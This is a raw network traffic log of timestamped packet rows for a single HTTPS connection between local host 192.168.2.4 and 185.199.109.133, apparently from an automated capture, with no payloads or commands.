Dec 5, 2024 19:36:40.788249016 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.788255930 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.788923979 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.793561935 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.793593884 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.793621063 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.793626070 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.793658018 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.793672085 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.793816090 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.798851967 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.798876047 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.798913002 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.798922062 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.798949957 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.798964024 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.803051949 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.804202080 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.804224014 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.804256916 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.804260969 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.804295063 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.804307938 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.809734106 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.809768915 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.809797049 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.809801102 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.809830904 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.809849024 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.812549114 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.815504074 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.815527916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.815567970 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.815572023 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.815603971 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.815622091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.820719004 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.820743084 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.820787907 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.820792913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.820822954 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.820836067 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.830863953 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.884517908 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.884546041 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.884804964 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.884814024 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.884869099 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.890225887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.890254021 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.890327930 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.890333891 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.890367031 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.890394926 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.895478010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.895500898 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.895605087 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.895612955 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.895659924 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.933674097 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.933703899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.933898926 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.933911085 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.933954954 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.941668034 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.941692114 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.941764116 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.941771030 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.941809893 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.944875002 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.944902897 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.944936991 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.944941998 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.944976091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.944996119 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.949593067 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.949623108 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.949666977 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.949672937 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.949706078 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.949726105 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.953916073 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.953950882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.954019070 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:40.954024076 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:40.954068899 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.075423956 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.075452089 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.075548887 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.075562000 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.075613022 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.078972101 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.078993082 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.079049110 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.079055071 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.079093933 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.082232952 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.082257986 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.082302094 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.082307100 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.082335949 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.082350016 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.124607086 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.124631882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.124757051 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.124768972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.124912024 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.127692938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.127718925 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.127757072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.127762079 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.127794027 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.127814054 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.131680012 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.131699085 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.131753922 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.131759882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.131798029 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.134896040 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.134919882 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.134958982 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.134963989 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.134994984 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.135016918 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.138875961 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.138905048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.138933897 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.138941050 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.138972998 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.139014006 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.267833948 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.267858982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.268099070 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.268126011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.268174887 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.271075010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.271106958 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.271141052 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.271146059 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.271173000 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.271193027 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.274996042 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.275022030 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.275059938 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.275064945 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.275094986 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.275114059 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.316709995 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.316740990 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.316916943 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.316937923 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.316981077 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.320616007 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.320647955 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.320687056 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.320700884 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.320724964 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.320739985 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.324170113 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.324189901 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.324249029 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.324259996 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.324296951 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.327884912 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.327904940 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.327944040 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.327951908 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.327976942 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.327995062 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.329917908 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.330965996 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.330991030 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.331018925 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.331022978 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.331054926 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.342005968 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.462090969 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.462115049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.462193966 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.462204933 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.462245941 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.464885950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.464905977 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.464948893 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.464953899 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.464978933 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.464998007 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.468420982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.468441010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.468488932 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.468493938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.468519926 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.468539000 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.510514975 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.510539055 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.510615110 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.510643959 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.510657072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.510683060 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.514605999 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.514628887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.514684916 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.514691114 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.514729023 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.517641068 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.517663002 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.517699003 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.517704010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.517731905 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.517750978 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.521589041 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.521609068 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.521665096 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.521671057 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.521709919 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.525810957 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.525830030 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.525886059 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.525891066 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.525928974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.653048038 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.653075933 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.653147936 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.653161049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.653213978 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.656517982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.656539917 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.656569958 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.656574965 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.656622887 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.660505056 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.660526991 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.660588026 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.660593033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.660634041 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.702003956 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.702024937 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.702195883 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.702208996 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.702254057 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.706624031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.706657887 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.706685066 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.706690073 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.706720114 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.706739902 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.709398031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.709420919 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.709451914 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.709456921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.709495068 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.713012934 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.713032007 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.713077068 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.713082075 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.713099957 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.713121891 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.716265917 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.716289997 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.716331959 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.716336012 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.716363907 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.716378927 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.721085072 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.845511913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.845536947 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.845668077 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.845685959 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.845730066 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.849179029 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.849200964 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.849240065 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.849251032 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.849280119 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.849302053 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.852377892 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.852397919 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.852451086 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.852461100 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.852502108 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.894057035 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.894081116 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.894186020 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.894212961 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.894257069 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.897996902 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.898021936 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.898058891 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.898063898 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.898092985 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.898108959 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.901231050 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.901249886 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.901299953 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.901304960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.901351929 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.905073881 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.905096054 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.905141115 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.905145884 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.905189991 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.908337116 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.908374071 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.908406973 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:41.908411026 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:41.908451080 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.037384987 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.037409067 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.037482977 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.037507057 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.037545919 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.040883064 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.040905952 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.040941000 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.040961981 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.040973902 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.040997982 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.044936895 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.044954062 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.045007944 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.045021057 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.045084953 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.086154938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.086180925 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.086251974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.086287022 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.086328030 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.090212107 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.090230942 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.090327978 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.090333939 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.090379953 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.093336105 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.093357086 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.093394041 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.093399048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.093425989 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.093444109 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.097287893 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.097305059 CET	443	49733	185.199.109.133	192.168.2.4
